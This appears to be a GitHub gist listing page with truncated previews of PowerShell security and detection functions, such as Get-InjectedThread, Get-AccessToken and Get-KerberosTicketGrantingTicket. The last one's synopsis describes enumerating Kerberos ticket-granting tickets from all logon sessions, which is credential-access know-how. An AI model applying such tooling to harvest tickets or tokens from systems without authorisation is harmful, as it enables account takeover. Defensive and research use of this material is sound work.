This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-AccessToken | |
{ | |
param | |
( | |
[Parameter()] | |
[System.Diagnostics.Process[]] | |
$Process | |
) | |
begin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-InjectedThread | |
{ | |
<# | |
.SYNOPSIS | |
Looks for threads that were created as a result of code injection. | |
.DESCRIPTION | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-Hash | |
{ | |
<# | |
.SYNOPSIS | |
Get-Hash is a PowerShell Version 2 port of Get-FileHash that supports hashing files, as well as, strings. | |
.PARAMETER InputObject | |
This is the actual item used to calculate the hash. This value will support [Byte[]] or [System.IO.Stream] objects. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#requires -Version 3 | |
# Usage: | |
# Invoke-command -computername $server -scriptblock {FunctionName -param1 -param2} | |
# Author: Matt Graeber | |
# @mattifestation | |
# www.exploit-monday.com | |
function Invoke-Command | |
{ | |
[CmdletBinding(DefaultParameterSetName='InProcess', HelpUri='http://go.microsoft.com/fwlink/?LinkID=135225', RemotingCapability='OwnedByCommand')] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-StructureOffset | |
{ | |
<# | |
.SYNOPSIS | |
Returns the field offset of the unmanaged form of the managed structure. | |
.DESCRIPTION | |
Wraps the Marshal class' OffsetOf method to return the offset for all fields in the specified Structure. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This is really beta code used in my Detection Methodology post. I plan to write more efficient code when I get some more time. | |
function Get-ExtendedAttribute | |
{ | |
foreach($file in (Get-ChildItem -Path C:\ -Recurse)) | |
{ | |
$obj = Get-ExtendedAttribute -FilePath $file.FullName | Where-Object {$_ -ne $null} | |
$obj | Add-Member -MemberType NoteProperty -Name FileName -Value $file.FullName | |
Write-Output $obj | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function ConvertFrom-Base64 | |
{ | |
param | |
( | |
[Parameter(Mandatory = $true, ValueFromPipeline = $true)] | |
[string] | |
$Base64String | |
) | |
$stringBytes = [System.Convert]::FromBase64String($Base64String) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-KerberosTicketGrantingTicket | |
{ | |
<# | |
.SYNOPSIS | |
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
.DESCRIPTION | |
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Test-Condition | |
{ | |
param | |
( | |
[Parameter(Mandatory = $true)] | |
[bool] | |
$Result, | |
[Parameter(Mandatory = $true)] | |
[string] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Resolve-CommandLineToFilePath | |
{ | |
<# | |
.SYNOPSIS | |
The Resolve-CommandLineToFilePath function takes an arbitrary Command Line and resolves the called application/file's path. | |
.PARAMETER CommandLine | |
The CommandLine that you want to convert to a file path. |
NewerOlder